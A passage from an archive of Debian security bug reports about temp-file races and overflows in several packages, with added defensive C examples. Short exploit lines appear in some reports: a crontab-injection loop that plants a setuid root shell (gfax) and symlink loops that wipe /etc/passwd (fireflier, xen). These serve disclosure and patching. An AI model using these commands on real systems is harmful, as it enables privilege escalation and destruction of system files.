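    if (fd < 0) return -1;
    if (write(fd, "hello\n", 6) != 6) { close(fd); unlink(tmpl); return -1; }
    close(fd);
    snprintf(path_out, sz, "%s", tmpl);
    return 0;
}

int main(int argc, char **argv) {
    char buf[4096];
    if (argc < 2) { fprintf(stderr, "usage: %s FILE\n", argv[0]); return 2; }
    long n = read_as_invoker(argv[1], buf, sizeof buf);
    if (n < 0) { perror(argv[1]); return 1; }
    printf("read %ld bytes from %s as uid %u\n", n, argv[1], (unsigned)getuid());
    return 0;
}
```

Dropping privilege around the open is preferable to the report's fallback of a separate `stat()` or `access()` check, because a check-then-open pair can be raced between the two calls; here the permission decision and the open are the same syscall. A program that needs root only for its initial setup (a raw socket, say) is simpler still: do that work first, then `setuid(getuid())`/`setgid(getgid())` permanently before touching any user-supplied path.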







Bug#468050: Security problems present in xwine

2008-02-26 Thread Steve Kemp
Package: xwine
Version: 1.0.1-1.1
Severity: grave
Justification: user security hole
Tags: security

*** Please type your report below this line ***

  I'd urge for the removal of this package from Lenny/Sid because
 of bug 460783 + this one...

  xwine contains two flaws:

   1.  Insecure use of temporary files.
   2.  Broken permissions on /etc/wine/config

  Printing uses the static file '/tmp/temporaire' for spooling into
 with no sanity checks, then this:
  ./w_editeur.c:  system("cat /tmp/temporaire | lp ");
  ./w_editeur.c:  system("rm -f /tmp/temporaire");

  The second issue is more interesting.  The global wine configuration
 file is abused thusly:

 ./w_export.c:  system("cp -f ~/.wine/config /etc/wine/");
 ./w_export.c:  system("chmod 666 /etc/wine/config");

  I guess for this to work the program must be started by root,
 but if the permissions are 0666 then any user may edit the file
 and cause DOS for local users.  I'm not horribly familiar with
 Window configuration, but it does seem like you could cause
 arbitrary code to run when a local user invokes wine, and prints,
 via a configuration file like this:

 /etc/wine/config:
 [spooler]
 FILE: = tmp.ps
 LPT1: = |/tmp/bogus-spooler.lpr

  Mitigating circumstances are that these days Wine ignores
 /etc/wine/config  ~/.wine/config.  Instead this information
 is stored in the wine registry which actually renders this package
 pointless for etch+

Steve
-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.18-4-xen-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash






Bug#464058: [horde-vendor] Bug#464058: turba access checking issue

2008-02-21 Thread Steve Kemp
On Thu Feb 21, 2008 at 02:41:41 +0100, Gregory Colpart wrote:

 The package turba2 has vulnerabilities (See CVE-2008-0807, bug
 #464058 and changelogs of fixed sarge/etch packages).

  A shining example of how to handle security updates. Thanks very
 very much for the fixed packages, and the clear writeup.

  I'll upload them today, and handle the release when they are
 done.

Steve
-- 






Bug#452518: security.debian.org: Error update samba_3.0.24-6etch5_i386.deb

2007-11-23 Thread Steve Kemp
On Fri Nov 23, 2007 at 12:25:42 +, Domijor wrote:

Today I updated with aptitude the package samba to the version
samba_3.0.24-6etch5_i386.deb. I have a PDC server with Samba. The client
doesn't connect to the server. The client connects with smbfs. The system log is:

  The package introduced a regression affecting some users.
  An update is pending, in the meantime you can find fixed packages
 here:

  http://people.debian.org/~vorlon/samba/

Steve
-- 







Bug#452515: security.debian.org: Error update samba_3.0.24-6etch5_i386.deb

2007-11-23 Thread Steve Kemp
On Fri Nov 23, 2007 at 12:02:59 +, Error update samba_3.0.24-6etch5_i386.deb wrote:

 Today I updated with aptitude the package samba to the version
 samba_3.0.24-6etch5_i386.deb. I have a PDC server with Samba. The client
 doesn't connect to the server. The client connects with smbfs. The system log is:

  The package introduced a regression affecting some users.
  An update is pending, in the meantime you can find fixed packages
  here:

http://people.debian.org/~vorlon/samba/

Steve
-- 







Bug#446354: OpenBSD patch for CVE-2007-5365 is insufficient

2007-10-29 Thread Steve Kemp
On Mon Oct 29, 2007 at 19:33:17 +0100, Tomas Hoger wrote:

 During testing of our updated dhcp packages, we have found out that
 patch for CVE-2007-5365 used by OpenBSD was not sufficient and it was
 still possible to crash dhcpd.  Your dhcp packages released in DSA
 1388-1 also seem affected. You can find better patch based on dhcp-3.x
 code here:
 
   https://bugzilla.redhat.com/show_bug.cgi?id=327781#c5
 
 Note: [EMAIL PROTECTED] was notified on 2007-10-23.
 Updated DSA 1388-3 released on 2007-10-29.

  Thanks, we have a built package already.  I'm not sure who is
  releasing it - I guess I should since I did the previous one.
  I'll chase it tomorrow/Wednesday.

Steve
-- 






Bug#447795: xen-utils-3.0.3-1: [CVE-2007-3919] xenmon.py / xenbaked insecure file access

2007-10-23 Thread Steve Kemp
Package: xen-utils-3.0.3-1
Version: 3.0.3-0-3
Severity: grave
Tags: security
Justification: user security hole


  Xen versions 3.x, and 3.1 contain a tool for processing Xen trace
 buffer information.

  This tool uses the static file /tmp/xenq-shm insecurely allowing
 a local user to truncate any local file when xenbaked or xenmon.py
 are invoked by root.

  Sample session:

# setup.
[EMAIL PROTECTED]:~$ ln -s /etc/passwd /tmp/xenq-shm

# later.
[EMAIL PROTECTED]:~$ sudo xenbaked

# all gone.  :(
[EMAIL PROTECTED]:~$ ls -l /etc/passwd
-rw-r--r-- 1 0 root 327680 2007-10-17 00:14 /etc/passwd

  This flaw is known as CVE-2007-3919 by the common vulnerabilities
 and exposures project.

  As the filename needs to be shared between xenmon.py + xenbaked.c
 a random one cannot easily be generated.  The solution that 
 Debian will use for its security update is to create the file in
 a location which is only writable by root - /var/run.

  Security advisory will be released very soon.

Steve
-- 
-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-5-xen-amd64
Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1)

Versions of packages xen-utils-3.0.3-1 depends on:
ii  iproute20061002-3Professional tools to control the 
ii  libc6  2.3.6.ds1-13etch2 GNU C Library: Shared libraries
ii  libncurses55.5-5 Shared libraries for terminal hand
ii  python 2.4.4-2   An interactive high-level object-o
ii  python-central 0.5.12register and build utility for Pyt
ii  udev   0.105-4   /dev/ and hotplug management daemo
ii  xen-utils-common   3.0.3-0-2 XEN administrative tools - common 
ii  zlib1g 1:1.2.3-13compression library - runtime

Versions of packages xen-utils-3.0.3-1 recommends:
ii  bridge-utils  1.2-1  Utilities for configuring the Linu
ii  xen-hypervisor-3.0.3-1-amd64  3.0.3-0-3  The Xen Hypervisor on AMD64

-- no debconf information
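
The fixed-name temporary files reported throughout this thread (node-cli's `/tmp/<app>.log` and `.pid`, stalin's `/tmp/QobiScheme.tmp`, winkeydaemon's `/tmp/.winkey`, xwine's `/tmp/temporaire`, twiki's `/tmp/twiki` and `/tmp/xenq-shm` here) all fail the same way: the program creates and truncates a predictable path in a directory every local user can write to, so a symlink planted there beforehand redirects the write. The following C program is an added example, not code from any of those packages or from the reports: it reproduces the clobber against a throwaway victim file inside a private scratch directory, then shows the two open-flag defences, `O_CREAT|O_EXCL|O_NOFOLLOW` on the fixed name (the planted link is refused instead of followed) and `mkstemp()` for an unpredictable name. The third option mentioned for xen above, a fixed name under a root-only directory such as /var/run, is a directory-permission choice rather than an open-flag one and is not shown. The `/tmp/tmpdemo.XXXXXX` scratch directory, the victim content and the `tmpfile_demo` result struct are constructed for the demo.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Outcome of run_tmpfile_demo(), so the results can be inspected. */
struct tmpfile_demo {
    int  insecure_fd;            /* plain O_CREAT|O_TRUNC through the planted link */
    long victim_after_insecure;  /* victim size afterwards: 0, the link was followed */
    int  safe_fd;                /* O_EXCL|O_NOFOLLOW open of the same path: -1 */
    int  safe_errno;             /* EEXIST (O_EXCL) or ELOOP (O_NOFOLLOW): link refused */
    long victim_after_safe;      /* victim size afterwards: unchanged */
    int  mkstemp_fd;             /* unpredictable name created atomically: >= 0 */
};

/* Vulnerable shape shared by the reports: a fixed, predictable name opened
 * with create+truncate. Whatever already sits at the path, a symlink pointing
 * elsewhere included, is followed and clobbered. */
static int open_fixed_insecure(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened open of the same fixed name. O_EXCL turns any pre-existing entry
 * (a symlink included, wherever it points) into an error instead of a target,
 * and O_NOFOLLOW refuses to traverse a symlink as the final component. */
static int open_fixed_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

static long file_size(const char *path) {
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1;
}

/* Constructed victim content: 12 bytes. */
static int write_victim(const char *path) {
    FILE *f = fopen(path, "w");
    if (f == NULL) return -1;
    fputs("secret data\n", f);
    return fclose(f);
}

/* Builds a private scratch directory (so no other user is involved), plants a
 * symlink where the application expects its fixed temp file, and tries each
 * open strategy against it. Returns 0, or -1 if setup failed. */
int run_tmpfile_demo(struct tmpfile_demo *r) {
    char dir[] = "/tmp/tmpdemo.XXXXXX";       /* constructed scratch location */
    char victim[128], link[128], tmpl[128];

    if (mkdtemp(dir) == NULL) return -1;
    snprintf(victim, sizeof victim, "%s/victim.txt", dir);
    snprintf(link,   sizeof link,   "%s/app.log", dir);    /* the "fixed name" */
    snprintf(tmpl,   sizeof tmpl,   "%s/app.XXXXXX", dir);
    if (write_victim(victim) != 0 || symlink(victim, link) != 0) return -1;

    /* 1. The insecure open follows the link and empties the victim. */
    r->insecure_fd = open_fixed_insecure(link);
    if (r->insecure_fd >= 0) close(r->insecure_fd);
    r->victim_after_insecure = file_size(victim);

    /* 2. Restore the victim; the hardened open refuses the planted link. */
    if (write_victim(victim) != 0) return -1;
    r->safe_fd = open_fixed_safe(link);
    r->safe_errno = r->safe_fd < 0 ? errno : 0;
    r->victim_after_safe = file_size(victim);

    /* 3. Better still, no fixed name at all: mkstemp() creates the file with
     * O_CREAT|O_EXCL and mode 0600 under a random suffix. */
    r->mkstemp_fd = mkstemp(tmpl);
    if (r->mkstemp_fd >= 0) { close(r->mkstemp_fd); unlink(tmpl); }

    unlink(link); unlink(victim); rmdir(dir);
    return 0;
}

int main(void) {
    struct tmpfile_demo r;
    if (run_tmpfile_demo(&r) != 0) { perror("setup"); return 1; }
    printf("create+truncate through link: fd=%d, victim now %ld bytes\n",
           r.insecure_fd, r.victim_after_insecure);
    printf("O_EXCL|O_NOFOLLOW:            fd=%d (%s), victim still %ld bytes\n",
           r.safe_fd, strerror(r.safe_errno), r.victim_after_safe);
    printf("mkstemp:                      fd=%d\n", r.mkstemp_fd);
    return 0;
}
```

`O_EXCL` alone already refuses a symlink at the final path component; `O_NOFOLLOW` matters for opens that do not create. Neither flag helps when the parent directory itself is attacker-controlled, which is why `mkstemp()`/`mkdtemp()` (or a root-only directory, as the xen fix does) is the usual answer. The same applies to scripting languages: node-cli's paths should come from `fs.mkdtemp()` under `os.tmpdir()` or a per-user directory, and stalin's `uname -m >/tmp/QobiScheme.tmp` should read the command's output through a pipe rather than a file at all.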






Bug#446354: dhcp: stack-based buffer overflow (CVE-2007-5365)

2007-10-15 Thread Steve Kemp
On Fri Oct 12, 2007 at 22:51:24 +1000, Steffen Joeris wrote:

 A patch is attached below. Please tell me, if you want to take care of
 it or if i should upload.

  Thanks for the patch, I will upload with it.

Steve
-- 






Bug#441555: lighttpd: header overflow when using the mod_fastcgi extension

2007-09-11 Thread Steve Kemp
On Mon Sep 10, 2007 at 13:41:10 +0200, Stefan Andersson wrote:
 Package: lighttpd
 Version: 1.4.13-4etch1
 Severity: critical
 Tags: security
 Justification: arbitrary code execution

  Fixed already in DSA-1362.


Steve
-- 






Bug#436701: CVE-2007-1614: DoS and execution of arbitrary code

2007-08-08 Thread Steve Kemp
On Thu Aug 09, 2007 at 01:07:47 +1000, Steffen Joeris wrote:
 Package: zziplib
 Severity: grave
 Tags: security
 Justification: user security hole
 
 Hi
 
 The following CVE[0] has been issued against zziplib.

  This seems to be a low-risk, from the one page I found describing
 it:

 
http://www.securitylab.ru/forum/read.php?FID=21TID=40858MID=326187#message326187

  Basically zzcat $longfilename crashes.  I wouldn't have thought
 this would require a DSA.

Steve
--





Bug#435735: CVE-2007-3791: Buffer overflow in policyd

2007-08-04 Thread Steve Kemp
On Thu Aug 02, 2007 at 23:34:10 +0200, Stefan Fritsch wrote:
 Package: postfix-policyd
 Version: 1.80-2.1
 Severity: grave
 Tags: security
 Justification: user security hole
 
 A vulnerability has been found in policyd. From CVE-2007-3791:

  Building now.

Steve
-- 





Bug#396360: Maybe time for DSA?

2007-07-29 Thread Steve Kemp
On Sat Jul 28, 2007 at 11:18:54 +0300, Touko Korpela wrote:
 This bug has patch included, maybe security team could do upload?

  The code in Etch already contains this patch...  I've not
 had a chance to check sarge yet, but I'm thinking that we're 
 OK.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit






Bug#434888: Multiple vulnerabilities [CVE-2007-3946] [CVE-2007-3947] [CVE-2007-3948] [CVE-2007-3949] [CVE-2007-3950]

2007-07-27 Thread Steve Kemp
On Fri Jul 27, 2007 at 09:11:48 -0500, Adam Majer wrote:
 Package: lighttpd
 Severity: critical
 Tags: security
 
 Upstream patches from Trac seem to be available from upstream.

  Still waiting on CVE IDs.  I can upload without them, but I'd
 rather not ..

Steve
-- 





Bug#428368: lighttpd vuln patch

2007-07-24 Thread Steve Kemp
  This one isn't going to get released as-is, as there are a couple
 more pending issues with lighttpd.
  I'll roll them all up once I have valid identifiers for them.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit






Bug#434546: lighttpd: 1.4.16 has been released and contains security fixes

2007-07-24 Thread Steve Kemp
On Tue Jul 24, 2007 at 21:14:31 +0200, Olaf van der Spek wrote:

 Lighttpd 1.4.16 has been released and contains security fixes, see 
 http://www.lighttpd.net/2007/7/24/1-4-16-let-s-ship-it

  A release is in preparation, just waiting on CVE IDs.  We have
 one ..

Steve
-- 





Bug#428368: lighttpd vuln patch

2007-07-20 Thread Steve Kemp
On Fri Jul 20, 2007 at 11:02:07 +0200, Pierre Habouzit wrote:
   attached is the patch that fixes it. I'm going to NMU lighttpd in
 unstable, please someone takes care of etch.

  Joey if you could allocate a DOS CVE ID I'll do the upload,
 I've already done lighttpd patches for etch.

Steve
-- 





Bug#432924: [CVE-2007-3641, CVE-2007-3644, CVE-2007-3645] various security bugs

2007-07-13 Thread Steve Kemp
On Fri Jul 13, 2007 at 08:16:07 -0500, John Goerzen wrote:
 I will upload a fix to unstable shortly.  However, it sounds like this could 
 also impact the version in stable, so CCing [EMAIL PROTECTED]

  Yes that looks to be the case.

  If you had a patch that would apply to the version in Stable that
 would be appreciated.  I applied the FreeBSD patch but that failed
 more than it succeeded ..

  I'll have a few hours tomorrow to look at it, so don't worry too
 much if you can't supply it.

Steve
-- 





Bug#425625: CVE-2007-2754: integer overflow and heap-based buffer overflow vulnerability in freetype

2007-07-10 Thread Steve Kemp
On Mon Jul 09, 2007 at 17:43:47 -0700, Steve Langasek wrote:

  Ok, uploading.
 
 sigh -- please kick this one out, I just noticed I built it with
 stable-security as the target.

  I'd be happy to do that if you, or somebody else, could tell me
 how to do so..

 Let me know if you would like me to re-roll -7 or prepare a -8 instead.

  I think we need a -8 if the -7 has been seen, right?

Steve
-- 





Bug#425625: CVE-2007-2754: integer overflow and heap-based buffer overflow vulnerability in freetype

2007-07-09 Thread Steve Kemp
On Mon Jul 09, 2007 at 12:43:57 -0700, Steve Langasek wrote:

 I've uploaded a freetype 2.1.7-7 package to
 http://people.debian.org/~vorlon/freetype/, signed and built for sarge. 

  Thanks.

 Let me know if you would like me to upload this to security.d.o (I promise
 I'll even use the embargoed queue this time, so you don't have to go hunting
 for the upload ;).

  That'd be grand, thanks.

 Unfortunately, going back through my mail I see that there's another open
 security report against freetype, bug #426771.  I have not investigated this
 at all to confirm which versions of freetype are affected.  Please advise if
 you would like me to look into this for possible inclusion in 2.1.7-7.

  :(

  I think that for the moment it would be best to push this out so that
 we're all on a level playing field.  (Which reminds me some of the
 slower buildds have started catching up too..)

Steve
-- 





Bug#431893: CVE-2007-2839: Trivial local-root attack

2007-07-05 Thread Steve Kemp

Package: gfax
Version: 0.4.2-11
Severity: grave
Usertags: sourcescan
Tags: security

*** Please type your report below this line ***


  The gfax package as released in Sarge makes unsafe use of temporary files,
 which allows local users to gain root trivially.

  Etch, Lenny, and Sid are unaffected.


  The following code is in src/mgetty_setup.c:

/* if it's NULL then nuke the faxrunq crontab entry.  */
if ((fin = fopen("/etc/crontab", "r")) == NULL) {
    do_message(_("\nCan't open /etc/crontab\n"));
    return;
}
if ((fout = fopen("/tmp/crontab", "w")) == NULL) {
    do_message(_("\nCan't create /tmp/crontab\n"));
    return;
}

while (fgets(buf, 128, fin) != NULL) {
    fputs(buf, fout);
}
fclose(fout);
fclose(fin);

/* now copy the new file back to /etc */
if ((fin = fopen("/tmp/crontab", "r")) == NULL) {
    do_message(_("\nCan't open /tmp/crontab\n"));
    return;
}
if ((fout = fopen("/etc/crontab", "w")) == NULL) {
    do_message(_("\nCan't create /etc/crontab\n"));
    return;
}

while ((c = fgetc(fin)) != EOF)
    fputc(c, fout);

fclose(fout);
fclose(fin);
remove("/tmp/crontab");


  This can be abused to write arbitrary commands to the /etc/crontab file.

  If /tmp/crontab exists already, owned by a non-root user, then it will
 be truncated and trashed.  However, the ownership will still remain that
 of the non-root user - so a race condition between the first copy
 and the second copy can allow arbitrary line(s) to be appended to /etc/crontab.

  The following exploits this easily:

[EMAIL PROTECTED]:~$ while true; do echo */1 * * * * root /bin/cp /bin/sh /tmp 
 chmod 4755 /tmp/sh  /tmp/crontab; done

  When root runs the setup program things end up like this:

[EMAIL PROTECTED]:~$ ls -l /etc/crontab 
-rw-r--r-- 1 root root 60 2007-07-02 20:27 /etc/crontab

[EMAIL PROTECTED]:~$ cat /etc/crontab
*/1 * * * * root /bin/cp /bin/sh /tmp  chmod 4755 /tmp/sh

[EMAIL PROTECTED]:~$ ls -l /tmp/sh
-rwsr-xr-x 1 root root 769368 2007-07-02 20:28 /tmp/sh


Steve
-- 
http://www.steve.org.uk/
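A hardened version of the copy-through-/tmp pattern from the report above, added here as an example; it is not gfax's code, and the function name `rewrite_without_lines`, the `faxrunq` filter and the sample crontab lines are constructed for the demonstration. The scratch file is created next to the target with mkstemp(), so there is no fixed name for anyone to pre-create or symlink, and rename() swaps it in atomically, so there is no window between "copy out" and "copy back" in which another user's file can be substituted:

```c
#define _GNU_SOURCE
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Rewrite `path` in place, dropping every line that contains `needle`
 * (the job the gfax loop does for the faxrunq entry).  The scratch file is
 * created by mkstemp() in the target's own directory: the name is random,
 * the kernel creates it with O_EXCL (a pre-planted file or symlink at that
 * name makes the call fail instead of being followed), and rename()
 * replaces the target atomically.  Returns 0 on success, -1 on failure
 * (errno set, scratch file removed). */
int rewrite_without_lines(const char *path, const char *needle)
{
    char tmpl[PATH_MAX];
    if (snprintf(tmpl, sizeof tmpl, "%s.XXXXXX", path) >= (int)sizeof tmpl) {
        errno = ENAMETOOLONG;
        return -1;
    }
    int tfd = mkstemp(tmpl);               /* unique name, mode 0600 */
    if (tfd < 0)
        return -1;

    int rc = -1;
    FILE *in = fopen(path, "r");
    FILE *out = fdopen(tfd, "w");          /* owns tfd from here on */
    if (in == NULL || out == NULL)
        goto done;

    struct stat st;                        /* keep the target's mode bits */
    if (fstat(fileno(in), &st) == 0)
        fchmod(tfd, st.st_mode & 07777);

    char line[4096];                       /* lines longer than this are split */
    while (fgets(line, sizeof line, in) != NULL) {
        if (strstr(line, needle) != NULL)
            continue;                      /* drop the matching line */
        if (fputs(line, out) == EOF)
            goto done;
    }
    if (ferror(in) || fflush(out) != 0 || fsync(tfd) != 0)
        goto done;
    if (rename(tmpl, path) != 0)           /* atomic swap: no torn reads */
        goto done;
    rc = 0;

done:
    if (out != NULL) fclose(out); else close(tfd);
    if (in != NULL) fclose(in);
    if (rc != 0) unlink(tmpl);
    return rc;
}

/* Self-check on a constructed crontab copy inside a private temp directory
 * (not a real system crontab).  Returns 0 when the faxrunq line is gone
 * and the other two lines survive. */
int demo_rewrite(void)
{
    char dir[] = "/tmp/rewrite-demo.XXXXXX";
    if (mkdtemp(dir) == NULL)
        return -1;
    char path[PATH_MAX];
    snprintf(path, sizeof path, "%s/crontab", dir);

    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    fputs("SHELL=/bin/sh\n"
          "17 * * * * root run-parts /etc/cron.hourly\n"
          "*/5 * * * * root /usr/bin/faxrunq\n", f);
    fclose(f);

    int result = -1;
    if (rewrite_without_lines(path, "faxrunq") == 0 && (f = fopen(path, "r")) != NULL) {
        char buf[256];
        int lines = 0, hit = 0;
        while (fgets(buf, sizeof buf, f) != NULL) {
            lines++;
            if (strstr(buf, "faxrunq") != NULL)
                hit = 1;
        }
        fclose(f);
        result = (lines == 2 && !hit) ? 0 : -1;
    }
    unlink(path);
    rmdir(dir);
    return result;
}

int main(void)
{
    return demo_rewrite() == 0 ? 0 : 1;
}
```

Creating the scratch file in /etc rather than /tmp is the point: rename() only works within one filesystem, and the target directory is root-owned, so no unprivileged user can pre-create anything there.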





Bug#431893: Acknowledgement (CVE-2007-2839: Trivial local-root attack)

2007-07-05 Thread Steve Kemp

  This is fixed in DSA-1329-1.  Just reported here for reference.

Steve
-- 





Bug#431331: CVE-2007-2838: Allow arbitrary files to be created/truncated

2007-07-01 Thread Steve Kemp

Package: gsambad
Version: 0.1.5-5
Severity: grave
Usertags: sourcescan

*** Please type your report below this line ***

  Security issue: CVE-2007-2838
   
  The gsambad package contains a binary (which may only be
 executed by the root user) with the following code in it:


if((fp=popen("touch /tmp/gsambadtmp && chmod 600 /tmp/gsambadtmp && "
             "smbstatus 2>&1 > /tmp/gsambadtmp", "w"))==NULL)
{
    /* Dont show a popup */
    return;
}

  This can be used to create/trash arbitrary files upon the system with
 a symlink attack.

Steve
-- 





Bug#431332: CVE-2007-2837: Arbitrary file removal

2007-07-01 Thread Steve Kemp

Package: fireflier-server
Version: 1.1.6-3
Severity: grave
Usertags: sourcescan

*** Please type your report below this line ***

  Security issue: CVE-2007-2837.

  The server, fireflierd, runs with root privileges and the code
 contains this gem which I think speaks for itself:

string getRule(unsigned int chainid, int rulenum)
{
   ...

   cmd="rm -f /tmp/fireflier.rules && touch /tmp/fireflier.rules && "
       "chmod 0700 /tmp/fireflier.rules && ";
   cmd+=IPTABLES_SAVE;
   cmd+=" > /tmp/fireflier.rules";
   if(DEBUG)
     cout<<"cmd: "<<cmd<<endl;

   system(cmd.c_str());

   ...
}


  This contains several race conditions, and can be trivially exploited to
 remove any file on the server as root.

  For example run this as a user inside GNU screen:
   [EMAIL PROTECTED]:~$ while true; do ln -s  /etc/passwd  
/tmp/fireflier.rules; done

  Wait for a root user to fetch/update/delete a rule using one of the available
 clients, and the /etc/passwd file will be removed.

Steve
--
#  Kink-Friendly Dating
http://ctrl-alt-date.com/
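The gsambad and fireflier reports above share one pattern: a root-privileged program shells out with the command's output redirected to a fixed path under /tmp, and the `rm -f`/`touch`/`chmod` prelude only narrows the race instead of closing it. The following is an added example, not code from either project, of the safe shape: create the output file with mkstemp(), hand the descriptor to the child, and exec the program directly so no shell and no path string are involved. The function name `run_to_tempfile`, and /bin/echo with its sample string as a stand-in for smbstatus or iptables-save, are constructed for the demonstration:

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Run `argv` with its stdout and stderr captured in a temporary file that
 * no other process can reach by name.  mkstemp() creates the file with a
 * random name, O_EXCL and mode 0600, so the rm/touch/chmod dance and its
 * race are gone; the descriptor is passed to the child with dup2(), so the
 * path never appears on a shell command line and no shell runs at all.
 * Returns a descriptor positioned at the start of the output, or -1
 * (the child must exit with status 0). */
int run_to_tempfile(char *const argv[])
{
    char tmpl[] = "/tmp/capture.XXXXXX";
    int fd = mkstemp(tmpl);
    if (fd < 0)
        return -1;
    unlink(tmpl);                          /* keep only the descriptor */

    pid_t pid = fork();
    if (pid < 0) {
        close(fd);
        return -1;
    }
    if (pid == 0) {
        /* child: both output streams go to the private file, then exec */
        if (dup2(fd, STDOUT_FILENO) < 0 || dup2(fd, STDERR_FILENO) < 0)
            _exit(127);
        close(fd);
        execv(argv[0], argv);              /* no /bin/sh, no string splicing */
        _exit(127);
    }

    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status) || WEXITSTATUS(status) != 0) {
        close(fd);
        return -1;
    }
    if (lseek(fd, 0, SEEK_SET) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Self-check: capture the output of /bin/echo (a constructed stand-in for
 * smbstatus or iptables-save) and compare it.  Returns 0 on success. */
int demo_capture(void)
{
    char *argv[] = { "/bin/echo", "constructed sample output", NULL };
    int fd = run_to_tempfile(argv);
    if (fd < 0)
        return -1;
    char buf[64];
    ssize_t n = read(fd, buf, sizeof buf - 1);
    close(fd);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return strcmp(buf, "constructed sample output\n") == 0 ? 0 : -1;
}

int main(void)
{
    return demo_capture() == 0 ? 0 : 1;
}
```

Because the file is unlinked as soon as it is created, nothing is left behind in /tmp when the program exits or crashes, and there is no name left for a later `rm -f` or `ln -s` to race against.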





Bug#431336: CVE-2007-2835 : Buffer overflow.

2007-07-01 Thread Steve Kemp
Package: unicon-imc2
Version: 3.0.4-11
Severity: grave
Usertags: sourcescan

*** Please type your report below this line ***

  CVE-2007-2835 : Allows local root compromise via zhcon.

  Anyway, the setuid(0) zhcon application links to this library,
 which contains a buffer overflow which may be used to gain root.
 (Actually any application using this library can be exploited; 
 this is the only setuid one I could spot.)

  The source of this problem is ./unicon/ImmModules/cce/CCE_pinyin.c:

static int
IMM_Flush ()
{
  char name[256];
  sprintf(name,"%s/.pyinput/usrphrase.tab",getenv("HOME"));
  SaveUsrPhrase(name);
  sprintf(name,"%s/.pyinput/sysfrequency.tab",getenv("HOME"));
  SavePhraseFrequency(name);

  return 1;
}

  There are similar problems in the file /unicon/ImmModules/cce/xl_pinyin.c
 too.


Steve
-- 
# Commercial Debian GNU/Linux Support
http://www.linux-administration.org/
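An added example, not unicon's code, of building the $HOME-derived path into a fixed buffer; the function name `build_home_path` and the sample HOME values are constructed for it. Beyond replacing sprintf() with snprintf() it rejects an unset HOME (a setuid program can be started with an empty environment, and passing NULL to %s is undefined) and treats truncation as an error, because a silently truncated path is still a valid path, just not the one intended:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Build "<home>/.pyinput/<file>" into `out`.  Returns 0 on success and -1
 * when home is NULL, empty or not absolute, or when the result would not
 * fit in `outlen` bytes (the buffer is then left empty).  `home` is a
 * parameter rather than getenv("HOME") so the rule can be exercised with
 * constructed values; real callers pass getenv("HOME"). */
int build_home_path(const char *home, const char *file, char *out, size_t outlen)
{
    if (home == NULL || home[0] != '/' || file == NULL || outlen == 0)
        return -1;
    int n = snprintf(out, outlen, "%s/.pyinput/%s", home, file);
    if (n < 0 || (size_t)n >= outlen) {    /* snprintf would have truncated */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Self-check with constructed inputs, including a HOME longer than the
 * 256-byte buffer the vulnerable IMM_Flush() writes into.  Returns 0 when
 * every case behaves as intended, otherwise the number of the failing case. */
int demo_paths(void)
{
    char name[256];

    /* 1: the normal case formats exactly as sprintf() did */
    if (build_home_path("/home/alice", "usrphrase.tab", name, sizeof name) != 0)
        return 1;
    if (strcmp(name, "/home/alice/.pyinput/usrphrase.tab") != 0)
        return 2;

    /* 3: unset HOME is refused instead of being formatted as "(null)" */
    if (build_home_path(NULL, "usrphrase.tab", name, sizeof name) != -1)
        return 3;

    /* 4: an oversized HOME is refused instead of overflowing or truncating */
    char longhome[300];
    memset(longhome, 'A', sizeof longhome - 1);
    longhome[0] = '/';
    longhome[sizeof longhome - 1] = '\0';
    if (build_home_path(longhome, "usrphrase.tab", name, sizeof name) != -1)
        return 4;
    if (name[0] != '\0')
        return 5;

    return 0;
}

int main(void)
{
    return demo_paths() == 0 ? 0 : 1;
}
```

In a setuid binary the safer choice is usually not to trust HOME at all and derive the directory from getpwuid(getuid()) instead; the bounds check above is the minimum that turns the overflow into a clean failure.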






Bug#431331: CVE-2007-2838: Allow arbitrary files to be created/truncated

2007-07-01 Thread Steve Kemp
On Sun Jul 01, 2007 at 20:54:24 +0200, Daniel Baumann wrote:

 I assume that the 0.1.4-2etch1 upload a few minutes ago was a security
 upload of yours, hence I'll wait until this appears and upload then a
 fixed package to sid.

  yes that is correct.

  If you're happy to upload soon that would be great.  I'll attach the
 patch I used.

Steve
-- 
# Commercial Debian GNU/Linux Support
http://www.linux-administration.org/

diff -u gsambad-0.1.4/config.sub gsambad-0.1.4/config.sub
--- gsambad-0.1.4/config.sub
+++ gsambad-0.1.4/config.sub
@@ -4,7 +4,7 @@
 #   2000, 2001, 2002, 2003, 2004, 2005, 2006 Free Software Foundation,
 #   Inc.
 
-timestamp='2006-09-20'
+timestamp='2006-07-02'
 
 # This file is (in principle) common to ALL GNU software.
 # The presence of a machine in this file suggests that SOME GNU software
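Review bot: this config.sub hunk and the four that follow it are unrelated to CVE-2007-2838: they move `timestamp` backwards from 2006-09-20 to 2006-07-02 and drop machine types (score, xc16x, sde), i.e. an older autotools file overwrote the packaged one during the rebuild. A stable-security upload should carry the minimal fix; drop these hunks (or restore the packaged config.sub) so the security diff contains only src/populate_conns.c and the changelog.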
